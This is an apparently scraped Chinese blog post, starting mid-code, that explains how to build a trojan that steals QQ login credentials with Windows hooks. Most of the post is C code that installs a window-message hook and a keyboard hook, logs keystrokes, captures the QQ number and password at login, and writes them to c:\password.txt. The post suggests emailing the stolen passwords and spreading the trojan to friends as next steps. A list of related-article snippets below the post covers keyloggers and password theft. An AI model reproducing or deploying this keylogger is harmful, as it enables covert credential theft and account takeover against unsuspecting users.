具有密码输入隐藏功能(c语言编)6,C语言hook技术实现木马功能-盗QQ密码

最新推荐文章于 2023-02-13 22:05:32 发布
最新推荐文章于 2023-02-13 22:05:32 发布
阅读量324 收藏 1
点赞数
文章标签: 具有密码输入隐藏功能(c语言编)6

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼

}

else

{

// 卸载钩子

bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);

g_hProc = NULL;

g_hKey = NULL;

g_hNum = NULL;

}

return bRet;

}

上面是安装HOOK部分的代码,就这么简单,上面提到了CallWndProc,KeyboardProc是两个回调函数,是我第三部分要解释的钩子函数。

3,钩子函数的解释

CallWndProc,KeyboardProc是两个回调函数的原型和具体代码如下:

// 钩子过程,监视“登陆”的命令消息

LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)

{

CWPSTRUCT *p = (CWPSTRUCT *)lParam;

// 捕获“登陆”按钮

if (p->message == WM_COMMAND && p->wParam ==16032)

//下面个函数是我在第四部分介绍-“处理密码”部分会仔细说明

//当用户点了登陆按钮,说明QQ号码和QQ密码已经填写完毕,当然可以去获得密码了

GetPasswrod();

return CallNextHookEx(g_hProc, nCode, wParam, lParam);

}

// 键盘钩子过程,监视“登陆”的热键消息

LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)

{

// 捕获热键消息,记录键盘的按键盘过程,pmsg是PMSG类型的,i是全局Static类型的

pmsg[i].wParam =wParam;

i++;

if (wParam == VK_RETURN) //用户使用键盘“回车”来登陆,用户用了回车后,就可以可以去获得密码了

GetPasswrod();

return CallNextHookEx(g_hKey, nCode, wParam, lParam);

}

在明白了这两个钩子函数后就可以看后期是如何具体处理密码的了,这就是下面的第四部分内容

处理密码

如果您读到了此处,我想得暂停一会,先让我来帮你回忆一下前面提到的几个关键的变量

第一个:QQ号的子窗口句柄 g_hNum

第二个:QQ密码的子窗口句柄 g_hPsw //此部分暂时不使用,下面

第三个:存键盘按键的 pmsg

上面三变量分别出现在第二部分和第三部分,都是全局共享(shared)变量

QQ密码的子窗口句柄 g_hPsw 此部分暂时不使用,你可以看到下面代码中有句用到g_hPsw的语句是我注释掉了的,原因是无法通过那样去得到QQ密码,得处理按键消息

void GetPasswrod()

{

//声明变量和初始化

HANDLE f;

TCHAR num[13];

TCHAR psw[21];

TCHAR total[50];

int j;

memset(num,0,sizeof(num));

memset(total,0,sizeof(total));

memset(psw,0,sizeof(psw));

DWORD dw;

//得到QQ号的内容,以为有的人的QQ号是在登陆框有记录,其QQ号并是用键盘输入的

GetWindowText(g_hNum,(LPSTR)num,sizeof(num));

//GetWindowText(g_hPsw,(LPSTR)psw,sizeof(psw)); //此句不使用,无法这样获得密码

//提取出键盘记录,此内容也许全是密码,也许是QQ号+QQ密码

for(j=0;j<20;j++)

{

psw[j]=(TCHAR)pmsg[j*2].wParam ;

}

psw[j+1]=’\0’;

//把QQ号码和QQ密码写入C盘password.txt中

f=CreateFile("c:\\password.txt",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);

strcat(total,"号码");

strcat(total,num);

strcat(total,"密码:");

strcat(total,psw);

WriteFile(f,&total,sizeof(total),&dw,NULL);

CloseHandle(f);

}

最后在C盘password.txt也许会出现这样两种情况:

1)当QQ号是没有用输入,而已用的粘贴或者是电脑以前有记录则是:号码:21728812密码:TEST

2) 当QQ号是用的键盘输入,电脑没有QQ号记录时则是:号码:21728812密码:21728812TEST

可以看出,第2种情况把QQ当成了密码了,所以密码还得减去QQ号,

特别说明:我这样直接处理wParam参数,得到的字符密码全是大写的,具体大小写问题我没有就没有仔细去处理的,功能实现就行了,毕竟我使用他不用来盗密码的!

上面四部分基本上获得密码的功能介绍完毕。凡是没有介绍的变量皆是全局变量,没有提到的函数 如:GetWindowThreadProcessId(),SetWindowsHookEx(),UnhookWindowsHookEx(),CallNextHookEx(),CreateFile(),WriteFile() 等皆是Windows API,详细使用说明请查MSDN(http://www.msdn.com),我提到的“HOOK”,“钩子”是同一个意思,也许有的地方我说的钩子函 数,而另外一个地方说的是HOOK函数

按照“真正”的QQ“木马”来写,如:对QQ版本进行识别,密码自动发送到E-MAIL,加入QQ尾巴代码,使其自动传给好友的等功能,这里仅是向大家展示一下一些基本功能是怎么实现的,仅供学习。

邦之恋
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C语言 D3D12 Hook
06-28
注意 64位 Hook需要还原代码,因为64位Jmp 是14字节 C语言 D3D12 Hook,
木马控制技术(三) -- Hook技术
weixin_30528371的博客
08-12 379
此为《木马技术揭秘与防御》系列读书笔记 基本概念 钩子(Hook)是windows消息处理机制的一个平台: Ahookis a mechanism by which an application can intercept events, such as messages, mouse actions, and keystrokes. A function that int...
号不是只有黑客才能到,一枚普通的Python程序员也可以!
Python6359的博客
02-11 3076
其实到要弄到账号密码很简单,一般很多人在学校图书馆喜欢用电脑占座(以古度今,我好像好多年没去过学校图书馆了),而且出去的时候经常不锁屏,为了让大家养成良好的习惯,我来带大家写个小程序吧,无需输入任何密码就可以快速获取你存储在电脑浏览器中的所有账号和密码,算是通过实践出真知来给大家提个醒了~当然现在号啥的也并没啥卵用,以前我上次初中那会,去黑网吧玩,那时候还是玩的DNF刷一夜能得一点金币,结果第二天去的时候就一个剑魂上面留了把木棍!一般情况下,查看这些密码是需要输入电脑的开机密码的。
使用python实现版解锁密码
dalao2233的博客
02-13 979
使用python实现版解锁密码
QQ密技十五招
天河书阁 - VicRestart
06-22 4537
1.减少QQ占用内存资源的秘笈   登陆QQ后,占用内存:约8M   QQ离线,占用内存:约10M   秘笈:登陆QQ后,随便打开一个好友的对话窗口,把它最小化,QQ占用的内存就变为3M了,这对于内存小的朋友特别有用!! 2.QQ自定义头像上传成功率较高的方法   1.将图像剪裁成40*40,再大的图也是这么大..   2.将图像转换成bmp格式   3.满足以上条件后
QQ2007密码取程序介绍(参考部分网上代码)
dlj36的专栏
01-21 2651
      声名:本文只供研究学习之用,请误用于其他用途,后果本人概的负责.      QQ是目前大陆流行的IM工具,好象台湾多用的是777和MSN,本人还是感觉QQ好用.因为QQ软件真正做到了用户想要的.适合年轻人群体.呵呵,又跑提了.       先讲下具体思路,如果你不东vc++及windows程,你还是学好再来看把.contiune,      取得QQ登陆信息有好几种方法,伴随QQ的不
VC利用HOOK技术获取QQ游戏密码
11-05
VC 6.0利用HOOK技术实现QQ游戏密码的获取,该程序只适用QQ游戏,不适用QQ,因为QQ采用了很特殊的加密技术
use-force-update:React Hook强制您的功能组件进行更新
02-04
useForceUpdate是一个React Hook,可强制您的功能组件重新呈现。 useForceUpdate本身并没有用途。 这是一个很小的软件包,旨在集成到更大的钩子中,使仍依赖于this.forceUpdate()所有类功能都过时。 安装 npm ...
基于 IAT hook 的文件隐藏功能 完整代码+报告
01-12
通过 IAT Hook 的方法篡改它们的导入表,使这两个程序查看不到文件系统中指定名称的文件。 三 实验过程 1、主程序 (1)功能:将自己写的包含有攻击代码的 dll 文件注入到目标进程(本实验选择注入到“cmd.exe”...
纯C#实现Hook功能详解
08-31
主要介绍了纯C#实现Hook功能详解,小觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小过来看看吧
木马GOP——QQ密码
edison20的专栏
11-14 7362
 GOP是什么?GOP是Get OICQ Password的缩写,从这个名字我们就可以看出这是一个获取别人OICQ(现在应该称为QQ了)密码木马软件!如果你还没有受到它的攻击,那可是幸运了,我认识它的过程可是代价惨重啊!   一天,我打开QQ输入自己熟悉的密码后,静等着小企鹅的出现,谁知左等右等却等到了一个密码错误的提示窗口!再三确认自己的密码没有记错,当然也不会输错,那最大、最令人担心的可能
键盘监听木马病毒原理
DearXuan的博客
08-29 2722
病毒表现 键盘监听病毒在网吧中非常流行,它在启动后会监听用户的键盘输入事件,如果有人使用账号密码登录,那么他所按下的每一个键都会被记录下来,被发送给别有用心的人。再通过两次按键的时间差,或者根据回车、tab这些标志性按键,就可以大致推断出账号和密码。 原理分析 该病毒能够记录所有窗口的输入事件,因此基本可以确定是用了键盘钩子。钩子函数会在事件发生后第一时间收到通知并处理。这样无论用户输入了什么,病毒总能第一时间记录。 Qt实现 由于程序的特殊性,不提供完整代码和源文件。 首先注册全局键盘钩子
c语言木马大全,【C语言】后台木马程序
weixin_30412847的博客
05-19 864
该楼层疑似违规已被系统折叠隐藏此楼查看此楼DWORD dwWrited = 0, dwRecvd = 0;char szBuf[MAX_PATH] = {0};BOOL bRet = FALSE;while ( TRUE ) {dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);if ( dwRecvd > 0 && dwRec...
一个简单的键盘监听木马dawenxi的制作
qq_48637067的博客
12-25 1955
事实上,我最初是没想到这学期的物联网安全课程会以答辩形式作为考核的,更没想到的是老师竟然让我们自己设计一个针对物联网的病毒或者针对物联网的漏洞,还要求不能被查杀。这难度,属实大?_? 。可是,我不想挂科啊,就只能硬着头皮来了。 我害怕答辩时会出现功能相似的作品,就没有考虑wifi安全、U盘安全、路由器安全等(果然,答辩的时候一堆这几方面的作品,现在想想,还是后怕,哈哈)。灵感来自于之前上的一门《逆向工程》,在这门课的配套书上,我看到过记录键盘的木马程序。键盘可以说是我们最常用的硬件了,所以键盘的安全问题也就
QQ密码输入框(防键盘钩子)原理分析
muyedongfeng的专栏
10-21 1129
1.网上看到的一些防星号查看器的代码大多是在后台维护一个字符串(真实的密码),界面则不显示真实的密码,这样做,维护那个字符串很费事,就因为我之前那样做过,我才在看到WM_GETTEXT后想要重做一个 2.防键盘钩子,在做上面的功能是,突然想到,如果自己模拟发一些乱七八糟的按键消息,然后自己区分哪些是垃圾哪些是用户真正的按键,那钩子就到不取密码了,所以又加了这个功能.后来自己做了一个钩子看了一下效
HOOK&DLL
shen8686的专栏
11-02 1828
<br />//通过HOOK获取QQ游戏登录密码<br />//by redice 2008.7.19<br />//[email protected]<br /><br />声明:本文章只为学习,文章提到的内容早就不能QQ密码~~<br />不是什么新鲜货了,只是想重温一下钩子及 DLL的写...<br /><br />先发个程序运行效果图:<br /> <br /><br />不得不先说一下API函数SendMessage:<br /><br />使用SendMessage向辑框窗口发送WM_GETT
不用hook,取得QQ密码
djsyz的专栏
08-13 1808
对于用鼠标点登录的方法,可以用timer查询鼠标是否在登录的坐标。这个edit和QQ的不一样,解决方法,把它透明处理,不能直接用DELPHI透明。这样控件也会不显示了,或者自己到网上下一个只有窗体透明的控件,然后用label放在edit1的位置上。我已经实现了,在这里就只谈方法吧。因为只是学术研究,不是在写号程序,所以没有加入任何隐藏和自动启动程序的代码。想犯罪的低素质程序员还请自己加进
结合c语言代码,使用linux hook函数实现write和read设备文件时操作某个寄存器
最新发布
06-10
首先,需要明确一点:Linux hook函数是一类内核函数,它们被用来拦截并处理一些系统调用或硬件中断等事件。因此,要实现在write和read设备文件时操作某个寄存器,就需要hook函数,将其注册到相应的系统调用中。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值